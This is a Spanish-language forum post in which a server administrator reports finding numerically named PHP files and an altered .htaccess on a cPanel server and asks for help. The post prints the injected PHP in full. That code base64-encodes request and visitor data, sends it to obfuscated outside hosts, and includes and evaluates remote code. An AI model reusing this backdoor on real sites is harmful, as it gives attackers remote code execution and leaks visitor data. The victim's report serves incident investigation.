Foros del Web » Administración de Sistemas » Software para Servers »

¿Servidor atacado?

Estas en el tema de ¿Servidor atacado? en el foro de Software para Servers en Foros del Web. Hola a todos, Desde hace algún tiempo estoy detectando en varias cuentas Cpanel archivos numéricos en php tipo: 31543.php, 188357.php, etc. con contenido tipo: Código ...
  #1 (permalink)  
Antiguo 17/03/2008, 15:17
 
Fecha de Ingreso: septiembre-2007
Mensajes: 106
Antigüedad: 17 años, 2 meses
Puntos: 1
¿Servidor atacado?

Hola a todos,

Desde hace algún tiempo estoy detectando en varias cuentas Cpanel archivos numéricos en php tipo: 31543.php, 188357.php, etc. con contenido tipo:

Código PHP:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>
Además se me ha ocurrido comprobar el contenido de algunos ficheros .htaccess y me he encontrado lo siguiente:

Options -MultiViews
ErrorDocument 404 //administration/7929.php

Es un servidor dedicado en donde tengo un WHmanager y no se por donde coger este error o vulnerabilidad. Habría alguién por aquí que haya salido de la misma situación?

Gracias
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 02:40.